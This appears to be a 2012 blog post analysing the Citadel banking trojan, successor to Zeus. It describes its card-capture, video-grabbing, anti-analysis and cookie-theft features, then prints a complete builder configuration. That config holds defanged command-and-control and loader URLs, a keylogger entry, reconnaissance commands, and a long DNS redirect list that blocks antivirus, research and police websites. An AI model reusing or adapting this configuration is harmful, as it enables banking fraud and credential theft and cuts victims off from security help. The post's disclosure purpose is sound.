martes, 18 de septiembre de 2012

Config file troyan Citadel Builder 1.3.4.5


This document presents the config file used for Citadel troyan, successor of famous Zeus banker Troyan that is used to create the malicious binary that will infect users and will communicate with the server that host the criminal infrastructure.

Among all the new features of this new version underlines its modular configuration depending on the modules that have been purchased on the black market.

One of these modules is the "CardSwipe" whose purpose is to capture all confidential data from credit cards to operate with them fraudulently.

In this config file criminals have this option On.

  enable_luhn10_get 1
  enable_luhn10_post 1
  
It was possible to reproduce the inyection that makes the Troyan on the infected machine and capture the screen that appears on user navigation asking to enter all his confidential data from the credit card when is accessing to Internet banking.



Is noted how troyan request secret PIN number (ATM Pin) and user identification code of social Insurance (SSN), data that is never requested to the customer under any circumstance.

Other configuration parameters allow to capture video footage from the infected computer

use_module_video 0
entry "Video"
    quality 1
    length 500
  end
  
This is very useful for criminals to capture the screen sequence in real time when the user enters the secret codes of transfer authorization and bypass authentication systems based on virtual keyboard.

Another commands also let Citadel to capture data sent through the Chrome browser, enable protection against virtual machines to prevent that binary malware could be analyzed, disable sending of cookies and block access to antivirus companies websites and malware protection websites. Redirecting usernavigation to Google homepage ( 209.85.229.104) everytime users try to access them. This doesn't change the hosts file on the infected computer but do it by controlling the computer's DNS cache.

Even also blocks access to webpages of law enforcement and police corps against cybercrime.

 In Next lines it will be showed the configuration of Citadel Builder 1.3.4.5






;; Default config + updated AV's list (redirect to google.com)
;; Citadel Builder 1.3.4.5
;; SHORT MANUAL BELOW ------------>
;; url_config1 is required!!! url_config2 & url_config3 are optional, you can setup it like a reserve config host.
;; report_software - report to gate about installed firewall,antivirus,software: 1 is enabled
;; disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off. 0 is enabled.
;; enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it on a GET parsing by LUHN10 algorithm.
;; enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).
;; use_module_video 1/0 - Do you really want to use video grabber? If no, please switch it off. 1 is enabled.
;; disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP:// logs grabber? 1 is enabled.
;; package_max_size 50 - logs reports transmission size(KB), stay it as default.
;; timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This option takes exe link from "url_loader" section.
;; antiemulation_enable 0/1 - if you enable it, you can't test it on virtual machines such as VMWare/Virtualbox.
;; disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and .sol files will be deleted.
;; For other information please open the "Personal Manual"
;; IF YOU DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.
;; <------------------ END OF SHORT MANUAL.

entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  timer_logs  7 20
  timer_stats 10 20
  timer_modules 7 10
  timer_autoupdate 8
  url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"

  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  disable_httpgrabber 1
  report_software 1
  disable_antivirus 0
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  encryption_key "*******************************"
  use_module_video 0
end

entry "DynamicConfig"
  url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"
  url_server "http : //gremlindefault.net/mainsession/redir.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
            "http : //gremlindefault.net/mainsession/game_install.bin"
  end
  entry "WebFilters"
    "!http : //*"
  end
  entry "WebDataFilters"
    ;"http : //mail.rambler.ru/*" "passw;login"
  end
  entry "WebFakes"
    ;"http : //www.google.com" "http : //www.yahoo.com" "GP" "" ""
  end
  entry "DnsFilters"


bitdefender.com=209.85.229.104
download.bitdefender.com=209.85.229.104
update.bitdefender.com=209.85.229.104
wfbs51-p.activeupdate.trendmicro.com=209.85.229.104
wfbs60-p.activeupdate.trendmicro.com=209.85.229.104
iau.trendmicro.com=209.85.229.104
licenseupdate.trendmicro.com=209.85.229.104
csm-as.activeupdate.trendmicro.com=209.85.229.104
wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104
oc.activeupdate.trendmicro.com=209.85.229.104
update.avg.com=209.85.229.104
update.grisoft.com=209.85.229.104
backup.avg.cz=209.85.229.104
backup.grisoft.cz=209.85.229.104
files2.grisoft.cz=209.85.229.104
files2.avg.cz=209.85.229.104
download.grisoft.cz=209.85.229.104
download.avg.cz=209.85.229.104
akamai.grisoft.cz=209.85.229.104
akamai.grisoft.cz.edgesuite.net=209.85.229.104
akamai.avg.cz=209.85.229.104
akamai.avg.cz.edgesuite.net=209.85.229.104
akamai.grisoft.com=209.85.229.104
akamai.avg.com=209.85.229.104
akamai.grisoft.com.edgesuite.net=209.85.229.104
akamai.avg.com.edgesuite.net=209.85.229.104
data-cdn.mbamupdates.com=209.85.229.104
su.pctools.com=209.85.229.104
pctools.com=209.85.229.104
download.lavasoft.com=209.85.229.104
secure.lavasoft.com=209.85.229.104
lavasoft.com=209.85.229.104
bitdefender.nl=209.85.229.104
virustotal.com=209.85.229.104
trendmicro.nl=209.85.229.104
trendmicro.com.au=209.85.229.104
www.trendmicro.com.au=209.85.229.104
securesoft.com.au=209.85.229.104
avira.com.au=209.85.229.104
gratissoftwaresite.nl=209.85.229.104
nod32.com.au=209.85.229.104
pandasecurity.com.au=209.85.229.104
lavasoft.com.au=209.85.229.104
avg.com.au=209.85.229.104
symantec-norton.com=209.85.229.104
housecall.trendmicro.com=209.85.229.104
forums.malwarebytes.org=209.85.229.104
malwarebytes.org=209.85.229.104
pchelpforum.com=209.85.229.104
pchelpforum.com=209.85.229.104
forums.cnet.com=209.85.229.104
techsupportforum.com=209.85.229.104
gratissoftware.nu=209.85.229.104
majorgeeks.com=209.85.229.104
forums.pcworld.com=209.85.229.104
antivirus.microbe.com.au=209.85.229.104
avast.com.au=209.85.229.104
avg-antivirus.com.au=209.85.229.104
nortonantiviruscenter.com=209.85.229.104
threatmetrix.com=209.85.229.104
www.zonealarm.com=209.85.229.104
firewallguide.com=209.85.229.104
auditmypc.com=209.85.229.104
comodo.com=209.85.229.104
free-firewall.org=209.85.229.104
schoonepc.nl=209.85.229.104
iopus.com=209.85.229.104
tucows.com=209.85.229.104
avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104
superantispyware.com.au=209.85.229.104
superantispyware.com=209.85.229.104
harveynorman.com.au=209.85.229.104
ca-store.com.au=209.85.229.104
netfreighters.com.au=209.85.229.104
securetec.com.au=209.85.229.104
anti-spyware.com.au=209.85.229.104
virusscan.jotti.org=209.85.229.104
virscan.org=209.85.229.104
antivir.ru=209.85.229.104
analysis.avira.com=209.85.229.104
hijackthis.de=209.85.229.104
uploadmalware.com=209.85.229.104
emsisoft.com=209.85.229.104
kaspersky.co.uk=209.85.229.104
bitdefender.co.uk=209.85.229.104
eset.co.uk=209.85.229.104
webroot.com=209.85.229.104
gdatasoftware.co.uk=209.85.229.104
pcpro.co.uk=209.85.229.104
webroot.co.uk=209.85.229.104
cyprotect.com=209.85.229.104
cloudantivirus.com=209.85.229.104
drweb-antivir.it=209.85.229.104
escanav.com=209.85.229.104
clamwin.com=209.85.229.104
nod32.nl=209.85.229.104
webroot.nl=209.85.229.104
av.eu=209.85.229.104
vergelijk.nl=209.85.229.104
antivirusvergelijk.nl=209.85.229.104
virussen.upc.nl=209.85.229.104
antivirus.startpagina.nl=209.85.229.104
avastav.nl=209.85.229.104
defenx.nl=209.85.229.104
gdata.nl=209.85.229.104
bitdefender.nl=209.85.229.104
removevirus.org=209.85.229.104
windows.microsoft.com=209.85.229.104
answers.microsoft.com=209.85.229.104
myantispyware.com=209.85.229.104
krebsonsecurity.com=209.85.229.104
antivirus.about.com=209.85.229.104
cleanuninstall.com=209.85.229.104
staples.com=209.85.229.104
esetindia.com=209.85.229.104
mcafee.free-trials.net=209.85.229.104
antivir-2012.com=209.85.229.104
panda-antivirus.en.softonic.com=209.85.229.104
softonic.com=209.85.229.104
freeantivirushelp.com=209.85.229.104
scanwith.com=209.85.229.104
bestantivirusreviewed.com=209.85.229.104
virus-help.net=209.85.229.104
cleanallspyware.com=209.85.229.104
kingsoftsecurity.com=209.85.229.104
threatfire.com=209.85.229.104
freeavg.com=209.85.229.104
clamav.net=209.85.229.104
pcthreat.com=209.85.229.104
2-viruses.com=209.85.229.104
trojan-killer.ne=209.85.229.104
virusinfo.info=209.85.229.104
www.virusinfo.info=209.85.229.104
projecthoneypot.org=209.85.229.104
www.projecthoneypot.org=209.85.229.104
novirus.ru=209.85.229.104
www.novirus.ru=209.85.229.104
anti-malware.com=209.85.229.104
www.anti-malware.com=209.85.229.104
offensivecomputing.net=209.85.229.104
www.offensivecomputing.net=209.85.229.104
zeustracker.abuse.ch=209.85.229.104
www.zeustracker.abuse.ch=209.85.229.104
www.malekal.com=209.85.229.104
www3.malekal.com=209.85.229.104
forum.malekal.com=209.85.229.104
www.threatexpert.com=209.85.229.104
threatexpert.com=209.85.229.104
www.microsoft.com=209.85.229.104
update.microsoft.com=209.85.229.104
www.virustotal.com=209.85.229.104
virusscan.jotti.org=209.85.229.104
www.av-comparatives.org=209.85.229.104
av-comparatives.org=209.85.229.104
av-test.org=209.85.229.104
www.av-test.org=209.85.229.104
www.scanwith.com=209.85.229.104
trendmicro.com.au=209.85.229.104
kasperskyanz.com.au=209.85.229.104
bitdefender.com.au=209.85.229.104
eset.com.au=209.85.229.104
vet.com.au=209.85.229.104
sm.mcafee.com=209.85.229.104
home.mcafee.com=209.85.229.104
toolbar.avg.com=209.85.229.104
stats.avg.com=209.85.229.104
www.virusbtn.com=209.85.229.104
adwarereport.com=209.85.229.104
avg.com.au=209.85.229.104
www.adwarereport.com=209.85.229.104
malwarebytes.org=209.85.229.104
www.malwarebytes.org=209.85.229.104
dw.com.com=209.85.229.104
nss-shasta-rrs.symantec.com=209.85.229.104
spywarewarrior.com=209.85.229.104
www.spywarewarrior.com=209.85.229.104
avsoft.ru=209.85.229.104
www.avsoft.ru=209.85.229.104
onecare.live.com=209.85.229.104
anubis.iseclab.org=209.85.229.104
wepawet.iseclab.org=209.85.229.104
iseclab.org=209.85.229.104
www.iseclab.org=209.85.229.104
www.freespaceinternetsec=209.85.229.104urity.com
freespaceinternetsecurit=209.85.229.104y.com
sunbelt-software.com=209.85.229.104
www.sunbelt-software.com=209.85.229.104
www.prevx.com=209.85.229.104
prevx.com=209.85.229.104
analysis.seclab.tuwien.a=209.85.229.104c.at
www.joebox.org=209.85.229.104
joebox.org=209.85.229.104
gmer.net=209.85.229.104
www.gmer.net=209.85.229.104
antirootkit.com=209.85.229.104
www.antirootkit.com=209.85.229.104
sectools.org=209.85.229.104
www.sandboxie.com=209.85.229.104
sandboxie.com=209.85.229.104
nepenthes.mwcollect.org=209.85.229.104
mwcollect.org=209.85.229.104
www.amtso.org=209.85.229.104
amtso.org=209.85.229.104
www.nsslabs.com=209.85.229.104
nsslabs.com=209.85.229.104
www.icsalabs.com=209.85.229.104
icsalabs.com=209.85.229.104
www.checkvir.com=209.85.229.104
checkvir.com=209.85.229.104
www.check-mark.com=209.85.229.104
check-mark.com=209.85.229.104
www.protectstar-testlab.=209.85.229.104org
protectstar-testlab.org=209.85.229.104
www.anti-malware-test.co=209.85.229.104m
anti-malware-test.com=209.85.229.104
av-test.de=209.85.229.104
www.av-test.de=209.85.229.104
www.wildlist.org=209.85.229.104
wildlist.org=209.85.229.104
www.aavar.org=209.85.229.104
aavar.org=209.85.229.104
centralops.net=209.85.229.104
www.staysafeonline.info=209.85.229.104
staysafeonline.info=209.85.229.104
www.rokop-security.de=209.85.229.104
rokop-security.de=209.85.229.104
www.wilderssecurity.com=209.85.229.104
wilderssecurity.com=209.85.229.104
www.superantispyware.com=209.85.229.104
superantispyware.com=209.85.229.104
update.microsoft.com=209.85.229.104
www.kaspersky.com=209.85.229.104
www.kaspersky.ru=209.85.229.104
kaspersky.ru=209.85.229.104
www.avp.ru=209.85.229.104
avp.ru=209.85.229.104
www.viruslist.com=209.85.229.104
viruslist.com=209.85.229.104
www.viruslist.ru=209.85.229.104
www.kaspersky-antivirus.ru=209.85.229.104
kaspersky-antivirus.ru=209.85.229.104
downloads1.kaspersky-labs.com=209.85.229.104
downloads2.kaspersky-labs.com=209.85.229.104
downloads3.kaspersky-labs.com=209.85.229.104
downloads4.kaspersky-labs.com=209.85.229.104
downloads5.kaspersky-labs.com=209.85.229.104
downloads-us1.kaspersky-labs.com=209.85.229.104
downloads-us2.kaspersky-labs.com=209.85.229.104
downloads-us3.kaspersky-labs.com=209.85.229.104
downloads-eu1.kaspersky-labs.com=209.85.229.104
downloads-eu2.kaspersky-labs.com=209.85.229.104
kavdumps.kaspersky.com=209.85.229.104
www.kasperskyclub.com=209.85.229.104
forum.kasperskyclub.com=209.85.229.104
forum.kasperskyclub.ru=209.85.229.104
kasperskyclub.ru=209.85.229.104
kasperskyclub.com=209.85.229.104
ftp.kasperskylab.ru=209.85.229.104
ftp.kaspersky.ru=209.85.229.104
ftp.kaspersky-labs.com=209.85.229.104
data.kaspersky.ru=209.85.229.104
z-oleg.com=209.85.229.104
www.z-oleg.com=209.85.229.104
drweb.com=209.85.229.104
www.drweb.com=209.85.229.104
freedrweb.com=209.85.229.104
www.freedrweb.com=209.85.229.104
drweb.com.ua=209.85.229.104
www.drweb.com.ua=209.85.229.104
drweb.ru=209.85.229.104
www.drweb.ru=209.85.229.104
av-desk.com=209.85.229.104
www.av-desk.com=209.85.229.104
drweb.net=209.85.229.104
www.drweb.net=209.85.229.104
ftp.drweb.com=209.85.229.104
dr-web.ru=209.85.229.104
www.dr-web.ru=209.85.229.104
download.drweb.com=209.85.229.104
support.drweb.com=209.85.229.104
updates.sald.com=209.85.229.104
sald.com=209.85.229.104
www.sald.com=209.85.229.104
drweb.imshop.de=209.85.229.104
safeweb.norton.com=209.85.229.104
www.safeweb.norton.com=209.85.229.104
www.symantec.com=209.85.229.104
shop.symantecstore.com=209.85.229.104
liveupdate.symantec.com=209.85.229.104
liveupdate.symantecliveu=209.85.229.104pdate.com
service1.symantec.com=209.85.229.104
www.service1.symantec.co=209.85.229.104m
security.symantec.com=209.85.229.104
liveupdate.symantec.d4p.=209.85.229.104net
securityresponse.symante=209.85.229.104c.com
sygate.com=209.85.229.104
www.sygate.com=209.85.229.104
esetnod32.ru=209.85.229.104
www.esetnod32.ru=209.85.229.104
eset.com=209.85.229.104
www.eset.com=209.85.229.104
eset.com.ua=209.85.229.104
www.eset.com.ua=209.85.229.104
nod32.com.ua=209.85.229.104
www.nod32.com.ua=209.85.229.104
download.eset.com=209.85.229.104
update.eset.com=209.85.229.104
eset.eu=209.85.229.104
www.eset.eu=209.85.229.104
nod32.it=209.85.229.104
www.nod32.it=209.85.229.104
nod32.su=209.85.229.104
www.nod32.su=209.85.229.104
nod-32.ru=209.85.229.104
www.nod-32.ru=209.85.229.104
allnod.com=209.85.229.104
www.allnod.com=209.85.229.104
allnod.info=209.85.229.104
www.allnod.info=209.85.229.104
virusall.ru=209.85.229.104
www.virusall.ru=209.85.229.104
nod32eset.org=209.85.229.104
www.nod32eset.org=209.85.229.104
eset.sk=209.85.229.104
www.eset.sk=209.85.229.104
nod32.nl=209.85.229.104
www.nod32.nl=209.85.229.104
dl1.antivir.de=209.85.229.104
dl2.antivir.de=209.85.229.104
dl3.antivir.de=209.85.229.104
dl4.antivir.de=209.85.229.104
free-av.com=209.85.229.104
www.free-av.com=209.85.229.104
free-av.de=209.85.229.104
www.free-av.de=209.85.229.104
avira.com=209.85.229.104
www.avira.com=209.85.229.104
avira.de=209.85.229.104
www.avira.de=209.85.229.104
www1.avira.com=209.85.229.104
dlpro.antivir.com=209.85.229.104
forum.avira.com=209.85.229.104
www.forum.avira.com=209.85.229.104
avirus.ru=209.85.229.104
www.avirus.ru=209.85.229.104
avira-antivir.ru=209.85.229.104
www.avira-antivir.ru=209.85.229.104
avirus.com.ua=209.85.229.104
www.avirus.com.ua=209.85.229.104
mcafee.com=209.85.229.104
www.mcafee.com=209.85.229.104
home.mcafee.com=209.85.229.104
us.mcafee.com=209.85.229.104
ru.mcafee.com=209.85.229.104
de.mcafee.com=209.85.229.104
ca.mcafee.com=209.85.229.104
fr.mcafee.com=209.85.229.104
au.mcafee.com=209.85.229.104
es.mcafee.com=209.85.229.104
it.mcafee.com=209.85.229.104
uk.mcafee.com=209.85.229.104
mx.mcafee.com=209.85.229.104
ru.mcafee.com=209.85.229.104
mcafee-online.com=209.85.229.104
www.mcafee-online.com=209.85.229.104
mcafeesecurity.com=209.85.229.104
www.mcafeesecurity.com=209.85.229.104
mcafeesecure.com=209.85.229.104
www.mcafeesecure.com=209.85.229.104
avertlabs.com=209.85.229.104
www.avertlabs.com=209.85.229.104
download.nai.com=209.85.229.104
nai.com=209.85.229.104
www.nai.com=209.85.229.104
secure.nai.com=209.85.229.104
eu.shopmcafee.com=209.85.229.104
shop.mcafee.com=209.85.229.104
siblog.mcafee.com=209.85.229.104
mcafeestore.com=209.85.229.104
www.mcafeestore.com=209.85.229.104
service.mcafee.com=209.85.229.104
siteadvisor.com=209.85.229.104
www.siteadvisor.com=209.85.229.104
scanalert.com=209.85.229.104
www.drsolomon.com=209.85.229.104
mcafee-at-home.com=209.85.229.104
wwww.mcafee-at-home.com=209.85.229.104
networkassociates.com=209.85.229.104
www.networkassociates.com=209.85.229.104
avast.ru=209.85.229.104
www.avast.ru=209.85.229.104
avast.com=209.85.229.104
www.avast.com=209.85.229.104
onlinescan.avast.com=209.85.229.104
download1.avast.com=209.85.229.104
download2.avast.com=209.85.229.104
download3.avast.com=209.85.229.104
download4.avast.com=209.85.229.104
download5.avast.com=209.85.229.104
download6.avast.com=209.85.229.104
download7.avast.com=209.85.229.104
free.avg.com=209.85.229.104
au.norton.com=209.85.229.104
trustdefender.com=209.85.229.104
avg.com=209.85.229.104
www.avg.com=209.85.229.104
sshop.avg.com=209.85.229.104
pctools.com=209.85.229.104
www.grisoft.cz=209.85.229.104
www.grisoft.com=209.85.229.104
free.grisoft.com=209.85.229.104
bitdefender.com=209.85.229.104
www.bitdefender.com=209.85.229.104
msecn.net=209.85.229.104
bitdefender.de=209.85.229.104
www.bitdefender.de=209.85.229.104
bitdefender.com.ua=209.85.229.104
www.bitdefender.com.ua=209.85.229.104
bitdefender.ru=209.85.229.104
www.bitdefender.ru=209.85.229.104
myaccount.bitdefender.co,=209.85.229.104
download.bitdefender.com=209.85.229.104
ftp.bitdefender.com=209.85.229.104
forum.bitdefender.com=209.85.229.104
upgrade.bitdefender.com=209.85.229.104
agnitum.ru=209.85.229.104
www.agnitum.ru=209.85.229.104
agnitum.com=209.85.229.104
www.agnitum.com=209.85.229.104
agnitum.de=209.85.229.104
www.agnitum.de=209.85.229.104
outpostfirewall.com=209.85.229.104
www.outpostfirewall.com=209.85.229.104
dl1.agnitum.com=209.85.229.104
dl2.agnitum.com=209.85.229.104
antivirus.comodo.com=209.85.229.104
comodo.com=209.85.229.104
www.comodo.com=209.85.229.104
forums.comodo.com=209.85.229.104
comodogroup.com=209.85.229.104
www.comodogroup.com=209.85.229.104
personalfirewall.comodo.com=209.85.229.104
www.personalfirewall.com=209.85.229.104
hackerguardian.com=209.85.229.104
www.hackerguardian.com=209.85.229.104
www.nsclean.com=209.85.229.104
nsclean.com=209.85.229.104
clamav.net=209.85.229.104
www.clamav.net=209.85.229.104
db.local.clamav.net=209.85.229.104
clamsupport.sourcefire.com=209.85.229.104
lurker.clamav.net=209.85.229.104
wiki.clamav.net=209.85.229.104
w32.clamav.net=209.85.229.104
lists.clamav.net=209.85.229.104
clamwin.com=209.85.229.104
www.clamwin.com=209.85.229.104
ru.clamwin.com=209.85.229.104
gietl.com=209.85.229.104
www.gietl.com=209.85.229.104
clamav.dyndns.org=209.85.229.104
f-secure.com=209.85.229.104
www.f-secure.com=209.85.229.104
support.f-secure.com=209.85.229.104
f-secure.ru=209.85.229.104
www.f-secure.ru=209.85.229.104
ftp.f-secure.com=209.85.229.104
europe.f-secure.com=209.85.229.104
www.europe.f-secure.com=209.85.229.104
f-secure.de=209.85.229.104
www.f-secure.de=209.85.229.104
support.f-secure.de=209.85.229.104
ftp.f-secure.de=209.85.229.104
f-secure.co.uk=209.85.229.104
www.f-secure.co.uk=209.85.229.104
retail.sp.f-secure.com=209.85.229.104
retail01.sp.f-secure.com=209.85.229.104
retail02.sp.f-secure.com=209.85.229.104
ftp.europe.f-secure.com=209.85.229.104
norman.com=209.85.229.104
www.norman.com=209.85.229.104
download.norman.no=209.85.229.104
sandbox.norman.no=209.85.229.104
norman.no=209.85.229.104
www.norman.no=209.85.229.104
niuone.norman.no=209.85.229.104
pandasecurity.com=209.85.229.104
www.pandasecurity.com=209.85.229.104
viruslab.ru=209.85.229.104
www.viruslab.ru=209.85.229.104
pandasoftware.com=209.85.229.104
www.pandasoftware.com=209.85.229.104
acs.pandasoftware.com=209.85.229.104
www.pandasoftware.es=209.85.229.104
anti-virus.by=209.85.229.104
www.anti-virus.by=209.85.229.104
virusblokada.ru=209.85.229.104
www.virusblokada.ru=209.85.229.104
vba32.de=209.85.229.104
www.vba32.de=209.85.229.104
ftp.nai.com=209.85.229.104
secuser.com=209.85.229.104
www.secuser.com=209.85.229.104
tds.diamondcs.com.au=209.85.229.104
windowsupdate.microsoft.com=209.85.229.104
lavasoftusa.com=209.85.229.104
www.lavasoftusa.com=209.85.229.104
lavasoftusa.de=209.85.229.104
www.lavasoftusa.de=209.85.229.104
diamondcs.com.au=209.85.229.104
shop.ca.com=209.85.229.104
downloads.my-etrust.com=209.85.229.104
v4.windowsupdate.microsoft.com=209.85.229.104
v5.windowsupdate.microsoft.com=209.85.229.104
noadware.net=209.85.229.104
www.noadware.net=209.85.229.104
zonelabs.com=209.85.229.104
www.zonelabs.com=209.85.229.104
moosoft.com=209.85.229.104
www.moosoft.com=209.85.229.104
secuser.model-fx.com=209.85.229.104
pccreg.antivirus.com=209.85.229.104
k-otik.com=209.85.229.104
vupen.com=209.85.229.104
www.vupen.com=209.85.229.104
housecall.trendmicro.com=209.85.229.104
trendmicro.com=209.85.229.104
www.trendmicro.com=209.85.229.104
us.trendmicro.com=209.85.229.104
uk.trendmicro.com=209.85.229.104
de.trendmicro.com=209.85.229.104
fr.trendmicro.com=209.85.229.104
es.trendmicro.com=209.85.229.104
au.trendmicro.com=209.85.229.104
it.trendmicro.com=209.85.229.104
br.trendmicro.com=209.85.229.104
antivirus.cai.com=209.85.229.104
sophos.com=209.85.229.104
www.sophos.com=209.85.229.104
securitoo.com=209.85.229.104
nordnet.com=209.85.229.104
www.nordnet.com=209.85.229.104
avgfrance.com=209.85.229.104
www.avgfrance.com=209.85.229.104
antivirus-online.de=209.85.229.104
www.antivirus-online.de=209.85.229.104
ftp.esafe.com=209.85.229.104
ftp.microworldsystems.com=209.85.229.104
ftp.ca.co=209.85.229.104
files.trendmicro-europe.com=209.85.229.104
inline-software.de=209.85.229.104
ravantivirus.com=209.85.229.104
www.ravantivirus.com=209.85.229.104
f-prot.com=209.85.229.104
www.f-prot.com=209.85.229.104
files.f-prot.com=209.85.229.104
secure.f-prot.com=209.85.229.104
vsantivirus.com=209.85.229.104
www.vsantivirus.com=209.85.229.104
openantivirus.org=209.85.229.104
www.openantivirus.org=209.85.229.104
www3.ca.com=209.85.229.104
dialognauka.ru=209.85.229.104
www.dialognauka.ru=209.85.229.104
anti-virus-software-review.com=209.85.229.104
www.anti-virus-software-review.com=209.85.229.104
www.vet.com.au=209.85.229.104
antiviraldp.com=209.85.229.104
www.antiviraldp.com=209.85.229.104
www.proantivirus.com=209.85.229.104
pestpatrol.com=209.85.229.104
www.pestpatrol.com=209.85.229.104
simplysup.com=209.85.229.104
www.simplysup.com=209.85.229.104
misec.net=209.85.229.104
www.misec.net=209.85.229.104
www1.my-etrust.com=209.85.229.104
authentium.com=209.85.229.104
www.authentium.com=209.85.229.104
finjan.com=209.85.229.104
www.finjan.com=209.85.229.104
www.ikarus-software.at=209.85.229.104
www.ika-rus.com=209.85.229.104
ika-rus.com=209.85.229.104
tinysoftware.com=209.85.229.104
www.tinysoftware.com=209.85.229.104
visualizesoftware.com=209.85.229.104
www.visualizesoftware.com=209.85.229.104
kerio.com=209.85.229.104
www.kerio.com=209.85.229.104
www.kerio.eu=209.85.229.104
www.zonelabs.com=209.85.229.104
zonelog.co.uk=209.85.229.104
www.zonelog.co.uk=209.85.229.104
webroot.com=209.85.229.104
www.webroot.com=209.85.229.104
www.lavasoft.nu=209.85.229.104
spywareguide.com=209.85.229.104
www.spywareguide.com=209.85.229.104
spyblocker-software.com=209.85.229.104
www.spyblocker-software.com=209.85.229.104
www.spamhaus.org=209.85.229.104
spamcop.net=209.85.229.104
www.spamcop.net=209.85.229.104
bobbear.co.uk=209.85.229.104
www.bobbear.co.uk=209.85.229.104
domaintools.com=209.85.229.104
www.domaintools.com=209.85.229.104
centralops.net=209.85.229.104
www.centralops.net=209.85.229.104
www.robtex.com=209.85.229.104
dnsstuff.com=209.85.229.104
www.dnsstuff.com=209.85.229.104
ripe.net=209.85.229.104
www.ripe.net=209.85.229.104
www.met.police.uk=209.85.229.104
nbi.gov.ph=209.85.229.104
www.nbi.gov.ph=209.85.229.104
www.police.gov.hk=209.85.229.104
treasury.gov=209.85.229.104
www.treasury.gov=209.85.229.104
cybercrime.gov=209.85.229.104
www.cybercrime.gov=209.85.229.104
www.cybercrime.ch=209.85.229.104
enisa.europa.eu=209.85.229.104
www.enisa.europa.eu=209.85.229.104
www.interpol.int=209.85.229.104
www.fsa.gov.uk=209.85.229.104
www.companies-house.gov.uk=209.85.229.104
fraudaid.com=209.85.229.104
www.fraudaid.com=209.85.229.104
scambusters.org=209.85.229.104
www.scambusters.org=209.85.229.104
spamtrackers.eu=209.85.229.104
www.spamtrackers.eu=209.85.229.104
  end
  entry "CmdList"
    "net view"
    "tasklist"
            "set"
  end
 
   entry "Keylogger"
    processes "calc___.exe"
    time 1
  end
 
  entry "Video"
    quality 1
    length 500
  end
end

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.